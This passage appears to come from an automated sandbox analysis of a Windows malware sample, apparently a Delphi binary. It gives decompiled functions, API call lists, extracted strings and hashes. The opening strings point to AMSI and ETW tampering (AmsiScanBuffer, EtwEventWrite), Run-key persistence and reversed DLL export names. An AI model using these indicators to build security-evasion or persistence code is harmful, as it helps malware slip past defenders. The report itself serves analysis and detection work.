                                                                            • EtwEventWrite , xrefs: 035A7012, 035A73E8
                                                                            • Contacts , xrefs: 035A6F96
                                                                            • DllGetClassObject , xrefs: 035A74DD, 035A7546
                                                                            • amsiproxy , xrefs: 035A7528, 035A754B, 035A756E, 035A7591
                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run , xrefs: 035A6F7C
                                                                            • AddPersonalTrustDBPages , xrefs: 035A70C1
                                                                            • amsi , xrefs: 035A703A, 035A705D, 035A7080, 035A70A3, 035A7410, 035A7433, 035A7456, 035A7479, 035A749C, 035A74BF, 035A74E2, 035A7505
                                                                            • DriverInitializePolicy , xrefs: 035A71B8
                                                                            • DllUnregisterServer , xrefs: 035A758C
                                                                            • SoftpubCheckCert , xrefs: 035A7161
                                                                            • SoftpubDefCertInit , xrefs: 035A7139
                                                                            • AmsiScanString , xrefs: 035A7035, 035A740B
                                                                            • OfficeInitializePolicy , xrefs: 035A7189
                                                                            • softpub , xrefs: 035A70C6, 035A70EE, 035A7116, 035A713E, 035A7166, 035A718E
                                                                            • softpub , xrefs: 035A71AC
                                                                            • AmsiUacInitialize , xrefs: 035A709E, 035A7474
                                                                            • HTTPSCertificateTrust , xrefs: 035A70E9
                                                                            • ntdll , xrefs: 035A7017, 035A73ED
                                                                            • AmsiUacScan , xrefs: 035A7497
                                                                            • SoftpubLoadSignature , xrefs: 035A7111
                                                                            • AmsiScanBuffer , xrefs: 035A7058, 035A742E
                                                                            • tcejbOssalCteGllD , xrefs: 035A7313
                                                                            • .url , xrefs: 035A6FB6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: ProtectVirtual$AddressProc$LibraryLoad$CloseProcess$CreateExitFlushHandleModuleOpenResumeThread
                                                                            • String ID: .url$AddPersonalTrustDBPages$AmsiInitialize$AmsiOpenSession$AmsiScanBuffer$AmsiScanString$AmsiUacInitialize$AmsiUacScan$Contacts$DllCanUnloadNow$DllGetClassObject$DllRegisterServer$DllUnregisterServer$DriverInitializePolicy$EtwEventWrite$HTTPSCertificateTrust$OfficeInitializePolicy$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SoftpubCheckCert$SoftpubDefCertInit$SoftpubLoadSignature$amsi$amsiproxy$ntdll$revreSretsigeRllD$softpub$softpub$tcejbOssalCteGllD$wuapi
                                                                            • API String ID: 3091534625-2714927154
                                                                            • Opcode ID: 5a8ccc9ec2caab73b0ac80a8eb5e1aad097f6e41829663d47ab6b1954964f980
                                                                            • Instruction ID: cabed5e1c35ddb713e1279691b77ca5e5a2e995b0115e4358785679504551983
                                                                            • Opcode Fuzzy Hash: 5a8ccc9ec2caab73b0ac80a8eb5e1aad097f6e41829663d47ab6b1954964f980
                                                                            • Instruction Fuzzy Hash: 4AD10DA8340E4A6FDA00F6EDF861E1D32F2FBCA500F605446A1145FB79DB60DD0ABB56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 41%
                                                                            E00455934(void* __eax, void* __ebx, void* __ecx) {
                                                                                struct _WNDCLASSA _v44;
                                                                                char _v48;
                                                                                char* _t22;
                                                                                CHAR* _t26;
                                                                                struct HINSTANCE__* _t27;
                                                                                intOrPtr* _t29;
                                                                                signed int _t32;
                                                                                intOrPtr* _t33;
                                                                                signed int _t36;
                                                                                struct HINSTANCE__* _t37;
                                                                                void* _t39;
                                                                                CHAR* _t40;
                                                                                struct HWND__* _t41;
                                                                                char* _t47;
                                                                                char* _t52;
                                                                                long _t55;
                                                                                long _t59;
                                                                                struct HINSTANCE__* _t62;
                                                                                intOrPtr _t64;
                                                                                void* _t69;
                                                                                struct HMENU__* _t70;
                                                                                intOrPtr _t77;
                                                                                void* _t83;
                                                                                short _t88;

                                                                                _v48 = 0;
                                                                                _t69 = __eax;
                                                                                _push(_t83);
                                                                                _push(0x455ad5);
                                                                                _push( *[fs:eax]);
                                                                                *[fs:eax] = _t83 + 0xffffffd4;
                                                                                if( *((char*)(__eax + 0xac)) != 0) {
                                                                                    L13:
                                                                                    _pop(_t77);
                                                                                    *[fs:eax] = _t77;
                                                                                    _push(0x455adc);
                                                                                    return E0040473C( &_v48);
                                                                                }
                                                                                _t22 = *0x462e14; // 0x46304c
                                                                                if( *_t22 != 0) {
                                                                                    goto L13;
                                                                                }
                                                                                *(_t69 + 0x40) = E00421724(E0045603C, __eax);
                                                                                *0x4627b4 = L00406E54;
                                                                                _t26 = *0x4627d4; // 0x4555d0
                                                                                _t27 = *0x4657f8; // 0x400000
                                                                                if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
                                                                                    _t62 = *0x4657f8; // 0x400000
                                                                                    *0x4627c0 = _t62;
                                                                                    _t88 = RegisterClassA(0x4627b0);
                                                                                    if(_t88 == 0) {
                                                                                        _t64 = *0x462b54; // 0x423558
                                                                                        E00406740(_t64,  &_v48);
                                                                                        E0040C11C(_v48, 1);
                                                                                        E00404184();
                                                                                    }
                                                                                }
                                                                                _t29 = *0x462c28; // 0x466310
                                                                                _t32 = *((intOrPtr*)( *_t29))(0) >> 1;
                                                                                if(_t88 < 0) {
                                                                                    asm("adc eax, 0x0");
                                                                                }
                                                                                _t33 = *0x462c28; // 0x466310
                                                                                _t36 = *((intOrPtr*)( *_t33))(1, _t32) >> 1;
                                                                                if(_t88 < 0) {
                                                                                    asm("adc eax, 0x0");
                                                                                }
                                                                                _push(_t36);
                                                                                _push(0);
                                                                                _push(0);
                                                                                _push(0);
                                                                                _push(0);
                                                                                _t37 = *0x4657f8; // 0x400000
                                                                                _push(_t37);
                                                                                _push(0);
                                                                                _t7 = _t69 + 0x8c; // 0x69746163
                                                                                _t39 = E00404C00( *_t7);
                                                                                _t40 = *0x4627d4; // 0x4555d0, executed
                                                                                _t41 = E00407364(_t40, _t39); // executed
                                                                                *(_t69 + 0x30) = _t41;
                                                                                _t9 = _t69 + 0x8c; // 0x44c90c
                                                                                E0040473C(_t9);
                                                                                *((char*)(_t69 + 0xac)) = 1;
                                                                                _t11 = _t69 + 0x40; // 0x10cc0000
                                                                                _t12 = _t69 + 0x30; // 0xe
                                                                                SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                                                                _t47 = *0x462cb4; // 0x4664f8
                                                                                if( *_t47 != 0) {
                                                                                    _t55 = E00456750(_t69);
                                                                                    _t13 = _t69 + 0x30; // 0xe
                                                                                    SendMessageA( *_t13, 0x80, 1, _t55); // executed
                                                                                    _t59 = E00456750(_t69);
                                                                                    _t14 = _t69 + 0x30; // 0xe
                                                                                    SetClassLongA( *_t14, 0xfffffff2, _t59);
                                                                                }
                                                                                _t15 = _t69 + 0x30; // 0xe
                                                                                _t70 = GetSystemMenu( *_t15, 0);
                                                                                DeleteMenu(_t70, 0xf030, 0);
                                                                                DeleteMenu(_t70, 0xf000, 0);
                                                                                _t52 = *0x462cb4; // 0x4664f8
                                                                                if( *_t52 != 0) {
                                                                                    DeleteMenu(_t70, 0xf010, 0);
                                                                                }
                                                                                goto L13;
                                                                            }

                                                                            APIs
                                                                              • Part of subcall function 00421724: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742
                                                                            • GetClassInfoA.USER32 ref: 00455993
                                                                            • RegisterClassA.USER32 ref: 004559AB
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            • SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47
                                                                            • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69
                                                                            • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A7C
                                                                            • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A87
                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A96
                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455AA3
                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455ABA
                                                                            Strings
                                                                            • X5B , xrefs: 004559B8
                                                                            • L0F , xrefs: 0045595D
                                                                            • Tn@ , xrefs: 0045597E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                            • String ID: L0F$Tn@$X5B
                                                                            • API String ID: 2103932818-3306811505
                                                                            • Opcode ID: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87
                                                                            • Instruction ID: 8b2a45e2b46d75add65d1c0541aee3cefa7279e0c305bd2f6c4295ac0c4b2ff4
                                                                            • Opcode Fuzzy Hash: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87
                                                                            • Instruction Fuzzy Hash: 62418070600700AFE710EF69DD92F6A3399AB04715F55417AFD00EB2D3EAB9AC448B6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                            E004478D4(void* __ebx, void* __edi, void* __eflags) {
                                                                                char _v8;
                                                                                char _v12;
                                                                                char _v16;
                                                                                char _v20;
                                                                                char _v24;
                                                                                long _v28;
                                                                                char _v32;
                                                                                char _v36;
                                                                                intOrPtr _t25;
                                                                                short _t27;
                                                                                char _t29;
                                                                                intOrPtr _t35;
                                                                                intOrPtr _t38;
                                                                                intOrPtr _t47;
                                                                                intOrPtr _t49;
                                                                                intOrPtr* _t50;
                                                                                intOrPtr _t53;
                                                                                struct HINSTANCE__* _t63;
                                                                                intOrPtr* _t78;
                                                                                intOrPtr* _t80;
                                                                                intOrPtr _t83;
                                                                                void* _t87;

                                                                                _v20 = 0;
                                                                                _v8 = 0;
                                                                                _push(_t87);
                                                                                _push(0x447a4c);
                                                                                _push( *[fs:eax]);
                                                                                *[fs:eax] = _t87 + 0xffffffe0;
                                                                                _v16 = GetCurrentProcessId();
                                                                                _v12 = 0;
                                                                                E0040970C("Delphi%.8X", 0,  &_v16,  &_v8);
                                                                                E00404790(0x466504, _v8);
                                                                                _t25 = *0x466504; // 0x27ea898
                                                                                _t27 = GlobalAddAtomA(E00404C00(_t25)); // executed
                                                                                *0x466500 = _t27;
                                                                                _t29 = *0x4657f8; // 0x400000
                                                                                _v36 = _t29;
                                                                                _v32 = 0;
                                                                                _v28 = GetCurrentThreadId();
                                                                                _v24 = 0;
                                                                                E0040970C("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                                                                E00404790(0x466508, _v20);
                                                                                _t35 = *0x466508; // 0x27f1cc0
                                                                                *0x466502 = GlobalAddAtomA(E00404C00(_t35));
                                                                                _t38 = *0x466508; // 0x27f1cc0
                                                                                *0x46650c = RegisterWindowMessageA(E00404C00(_t38));
                                                                                *0x466544 = E0041AA24(1);
                                                                                E004474DC();
                                                                                *0x4664ec = E00447288(1, 1);
                                                                                _t47 = E004543D8(1, __edi);
                                                                                _t78 = *0x462f14; // 0x466584
                                                                                *_t78 = _t47;
                                                                                _t49 = E004555E0(0, 1);
                                                                                _t80 = *0x462da4; // 0x466580
                                                                                *_t80 = _t49;
                                                                                _t50 = *0x462da4; // 0x466580
                                                                                E00457684( *_t50, 1);
                                                                                _t53 = *0x434ea4; // 0x434ea8
                                                                                E0041A1CC(_t53, 0x4376cc, 0x4376dc);
                                                                                _t63 = GetModuleHandleA("USER32");
                                                                                if(_t63 != 0) {
                                                                                    *0x46255c = GetProcAddress(_t63, "AnimateWindow");
                                                                                }
                                                                                _pop(_t83);
                                                                                *[fs:eax] = _t83;
                                                                                _push(0x447a53);
                                                                                E0040473C( &_v20);
                                                                                return E0040473C( &_v8);
                                                                            }


                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5
                                                                            • GlobalAddAtomA.KERNEL32 ref: 00447928
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00447943
                                                                            • GlobalAddAtomA.KERNEL32 ref: 00447979
                                                                            • RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F
                                                                              • Part of subcall function 0041AA24: InitializeCriticalSection.KERNEL32(00418518,?,?,004479A5,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0041AA43
                                                                              • Part of subcall function 004474DC: SetErrorMode.KERNEL32(00008000), ref: 004474F5
                                                                              • Part of subcall function 004474DC: GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526
                                                                              • Part of subcall function 004474DC: LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C
                                                                              • Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621
                                                                              • Part of subcall function 004474DC: SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C
                                                                              • Part of subcall function 004543D8: GetKeyboardLayout.USER32 ref: 0045441D
                                                                              • Part of subcall function 004543D8: GetDC.USER32(00000000), ref: 00454472
                                                                              • Part of subcall function 004543D8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C
                                                                              • Part of subcall function 004543D8: ReleaseDC.USER32 ref: 00454487
                                                                              • Part of subcall function 004555E0: LoadIconA.USER32 ref: 004556D7
                                                                              • Part of subcall function 004555E0: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709
                                                                              • Part of subcall function 004555E0: OemToCharA.USER32 ref: 0045571C
                                                                              • Part of subcall function 004555E0: CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B
                                                                              • Part of subcall function 004555E0: CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761
                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13
                                                                            • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24
                                                                            Strings
                                                                            • 0sC , xrefs: 004479B1
                                                                            • USER32 , xrefs: 00447A0E
                                                                            • Delphi%.8X , xrefs: 00447906
                                                                            • ControlOfs%.8X%.8X , xrefs: 00447957
                                                                            • AnimateWindow , xrefs: 00447A1E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow
                                                                            • String ID: 0sC$AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                            • API String ID: 1515865724-1439261924
                                                                            • Opcode ID: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6
                                                                            • Instruction ID: dcfdd3a89ae3525500325092b6b3c25abddc81a31b1afbe156e43ea57f3249c9
                                                                            • Opcode Fuzzy Hash: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6
                                                                            • Instruction Fuzzy Hash: 634193B0604205AFD700EFA9ED42A8D77F5EB44308B01457BF401F73A2EB79A9008B5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
E004555E0(void* __ecx, char __edx) {
    char _v5;
    char _v261;
    void* __ebx;
    void* __ebp;
    intOrPtr _t42;
    intOrPtr _t45;
    intOrPtr _t46;
    struct HINSTANCE__** _t58;
    intOrPtr _t63;
    struct HINSTANCE__** _t65;
    void* _t72;
    char* _t74;
    CHAR* _t76;
    intOrPtr _t80;
    char* _t81;
    intOrPtr _t87;
    intOrPtr* _t94;
    intOrPtr* _t95;
    intOrPtr _t96;
    void* _t97;
    char _t99;
    void* _t111;
    void* _t112;

    _t99 = __edx;
    _t97 = __ecx;
    if(__edx != 0) {
        _t112 = _t112 + 0xfffffff0;
        _t42 = E00403C34(_t42, _t111);
    }
    _v5 = _t99;
    _t96 = _t42;
    E00420664(_t97, 0);
    _t45 = *0x462d08; // 0x461bc8
    if( *((short*)(_t45 + 2)) == 0) {
        _t95 = *0x462d08; // 0x461bc8
        *((intOrPtr*)(_t95 + 4)) = _t96;
        *_t95 = 0x457090;
    }
    _t46 = *0x462dc0; // 0x461bd0
    if( *((short*)(_t46 + 2)) == 0) {
        _t94 = *0x462dc0; // 0x461bd0
        *((intOrPtr*)(_t94 + 4)) = _t96;
        *_t94 = E0045729C;
    }
    *((char*)(_t96 + 0x34)) = 0;
    *((intOrPtr*)(_t96 + 0x90)) = E004038F8(1);
    *((intOrPtr*)(_t96 + 0x98)) = E004038F8(1);
    *((intOrPtr*)(_t96 + 0xb0)) = E004038F8(1);
    *((intOrPtr*)(_t96 + 0x60)) = 0;
    *((intOrPtr*)(_t96 + 0x84)) = 0;
    *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018;
    *((intOrPtr*)(_t96 + 0x78)) = 0x1f4;
    *((char*)(_t96 + 0x7c)) = 1;
    *((intOrPtr*)(_t96 + 0x80)) = 0;
    *((intOrPtr*)(_t96 + 0x74)) = 0x9c4;
    *((char*)(_t96 + 0x88)) = 0;
    *((char*)(_t96 + 0xa5)) = 1;
    *((char*)(_t96 + 0xbc)) = 1;
    _t110 = E0042A7FC(1);
    *((intOrPtr*)(_t96 + 0xa0)) = _t57;
    _t58 = *0x462c04; // 0x463030
    E0042ABD0(_t110, LoadIconA( *_t58, "MAINICON"));
    _t21 = _t96 + 0xa0; // 0x736d
    _t63 = *_t21;
    *((intOrPtr*)(_t63 + 0x14)) = _t96;
    *((intOrPtr*)(_t63 + 0x10)) = 0x45795c;
    _t65 = *0x462c04; // 0x463030
    GetModuleFileNameA( *_t65, &_v261, 0x100);
    OemToCharA( &_v261, &_v261);
    _t72 = E0040CEC8( &_v261, 0x5c);
    if(_t72 != 0) {
        _t28 = _t72 + 1; // 0x1
        E00409044( &_v261, _t28);
    }
    _t74 = E0040CEFC( &_v261, 0x2e);
    if(_t74 != 0) {
        *_t74 = 0;
    }
    _t76 = CharNextA( &_v261); // executed
    CharLowerA(_t76);
    _t32 = _t96 + 0x8c; // 0x44c90c
    E004049AC(_t32, 0x100, &_v261);
    *((char*)(_t96 + 0xd4)) = 0;
    _t80 = E004217E0(0x456bf0, _t96); // executed
    *((intOrPtr*)(_t96 + 0xc8)) = _t80;
    _t81 = *0x462adc; // 0x463038
    if( *_t81 == 0) {
        E00455934(_t96, _t96, 0x100); // executed
    }
    *((char*)(_t96 + 0x59)) = 1;
    *((char*)(_t96 + 0x5a)) = 1;
    *((char*)(_t96 + 0x5b)) = 1;
    *((char*)(_t96 + 0xa6)) = 1;
    *((intOrPtr*)(_t96 + 0xa8)) = 0;
    E00457B38(_t96, 0x100);
    E00458698(_t96);
    _t87 = _t96;
    if(_v5 != 0) {
        E00403C8C(_t87);
        _pop( *[fs:0x0]);
    }
    return _t96;
}


                                                                            APIs
                                                                            • LoadIconA.USER32 ref: 004556D7
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709
                                                                            • OemToCharA.USER32 ref: 0045571C
                                                                            • CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B
                                                                            • CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761
                                                                              • Part of subcall function 00455934: GetClassInfoA.USER32 ref: 00455993
                                                                              • Part of subcall function 00455934: RegisterClassA.USER32 ref: 004559AB
                                                                              • Part of subcall function 00455934: SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47
                                                                              • Part of subcall function 00455934: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69
                                                                            Strings
                                                                            • 80F , xrefs: 00455794
                                                                            • MAINICON , xrefs: 004556CA
                                                                            • 00F , xrefs: 004556CF, 00455701
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                            • String ID: 00F$80F$MAINICON
                                                                            • API String ID: 2763768735-2155582179
                                                                            • Opcode ID: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a
                                                                            • Instruction ID: 3d65150858da70b31048973324385ee2371e73c537065fabeb210eff4a88cc2d
                                                                            • Opcode Fuzzy Hash: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a
                                                                            • Instruction Fuzzy Hash: B2516F706042849FDB10EF39D885B867BE4AF15308F4440BAEC48DF397DBB99948CB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
E0040D05C(void* __ebx, void* __edx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    char _v20;
    char _v24;
    char _v28;
    char _v32;
    char _v36;
    char _v40;
    char _v44;
    char _v48;
    char _v52;
    char _v56;
    char _v60;
    char _v64;
    char _v68;
    void* _t104;
    void* _t111;
    void* _t133;
    intOrPtr _t183;
    intOrPtr _t193;
    intOrPtr _t194;

    _t191 = __esi;
    _t190 = __edi;
    _t193 = _t194;
    _t133 = 8;
    do {
        _push(0);
        _push(0);
        _t133 = _t133 - 1;
    } while (_t133 != 0);
    _push(__ebx);
    _push(_t193);
    _push(0x40d327);
    _push( *[fs:eax]);
    *[fs:eax] = _t194; // executed
    E0040CF98(); // executed
    E0040BA08(__ebx, __edi, __esi);
    _t196 = *0x4658d4;
    if( *0x4658d4 != 0) {
        E0040BBE0(__esi, _t196);
    }
    _t132 = GetThreadLocale();
    E0040B954(_t43, 0, 0x14, &_v20);
    E00404790(0x465808, _v20);
    E0040B954(_t43, 0x40d33c, 0x1b, &_v24);
    *0x46580c = E00408B44(0x40d33c, 0, _t196);
    E0040B954(_t132, 0x40d33c, 0x1c, &_v28);
    *0x46580d = E00408B44(0x40d33c, 0, _t196);
    *0x46580e = E0040B9A0(_t132, 0x2c, 0xf);
    *0x46580f = E0040B9A0(_t132, 0x2e, 0xe);
    E0040B954(_t132, 0x40d33c, 0x19, &_v32);
    *0x465810 = E00408B44(0x40d33c, 0, _t196);
    *0x465811 = E0040B9A0(_t132, 0x2f, 0x1d);
    E0040B954(_t132, "m/d/yy", 0x1f, &_v40);
    E0040BC90(_v40, _t132, &_v36, _t190, _t191, _t196);
    E00404790(0x465814, _v36);
    E0040B954(_t132, "mmmm d, yyyy", 0x20, &_v48);
    E0040BC90(_v48, _t132, &_v44, _t190, _t191, _t196);
    E00404790(0x465818, _v44);
    *0x46581c = E0040B9A0(_t132, 0x3a, 0x1e);
    E0040B954(_t132, 0x40d370, 0x28, &_v52);
    E00404790(0x465820, _v52);
    E0040B954(_t132, 0x40d37c, 0x29, &_v56);
    E00404790(0x465824, _v56);
    E0040473C( &_v12);
    E0040473C( &_v16);
    E0040B954(_t132, 0x40d33c, 0x25, &_v60);
    _t104 = E00408B44(0x40d33c, 0, _t196);
    _t197 = _t104;
    if(_t104 != 0) {
        E004047D4( &_v8, 0x40d394);
    } else {
        E004047D4( &_v8, 0x40d388);
    }
    E0040B954(_t132, 0x40d33c, 0x23, &_v64);
    _t111 = E00408B44(0x40d33c, 0, _t197);
    _t198 = _t111;
    if(_t111 == 0) {
        E0040B954(_t132, 0x40d33c, 0x1005, &_v68);
        if(E00408B44(0x40d33c, 0, _t198) != 0) {
            E004047D4( &_v12, 0x40d3b0);
        } else {
            E004047D4( &_v16, 0x40d3a0);
        }
    }
    _push(_v12);
    _push(_v8);
    _push(":mm");
    _push(_v16);
    E00404AC0();
    _push(_v12);
    _push(_v8);
    _push(":mm:ss");
    _push(_v16);
    E00404AC0();
    *0x4658d6 = E0040B9A0(_t132, 0x2c, 0xc);
    _pop(_t183);
    *[fs:eax] = _t183;
    _push(E0040D32E);
    return E00404760( &_v68, 0x10);
}

                                                                            0x0040d238
                                                                            0x0040d23d
                                                                            0x0040d23f
                                                                            0x0040d258
                                                                            0x0040d241
                                                                            0x0040d249
                                                                            0x0040d249
                                                                            0x0040d26d
                                                                            0x0040d277
                                                                            0x0040d27c
                                                                            0x0040d27e
                                                                            0x0040d290
                                                                            0x0040d2a1
                                                                            0x0040d2ba
                                                                            0x0040d2a3
                                                                            0x0040d2ab
                                                                            0x0040d2ab
                                                                            0x0040d2a1
                                                                            0x0040d2bf
                                                                            0x0040d2c2
                                                                            0x0040d2c5
                                                                            0x0040d2ca
                                                                            0x0040d2d7
                                                                            0x0040d2dc
                                                                            0x0040d2df
                                                                            0x0040d2e2
                                                                            0x0040d2e7
                                                                            0x0040d2f4
                                                                            0x0040d307
                                                                            0x0040d30e
                                                                            0x0040d311
                                                                            0x0040d314
                                                                            0x0040d326

                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000000,0040D327,?,?,00000000,00000000), ref: 0040D092
                                                                              • Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972
                                                                            Strings
                                                                            • m/d/yy , xrefs: 0040D161
                                                                            • mmmm d, yyyy , xrefs: 0040D18E
                                                                            • :mm , xrefs: 0040D2C5
                                                                            • AMPM , xrefs: 0040D2A6
                                                                            • AMPM , xrefs: 0040D2B5
                                                                            • :mm:ss , xrefs: 0040D2E2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread
                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 4232894706-2493093252
                                                                            • Opcode ID: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6
                                                                            • Instruction ID: c9001327b6f8c8ca4ed95205664730ab35d4fa54160187d9b8d5148293e8bd77
                                                                            • Opcode Fuzzy Hash: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6
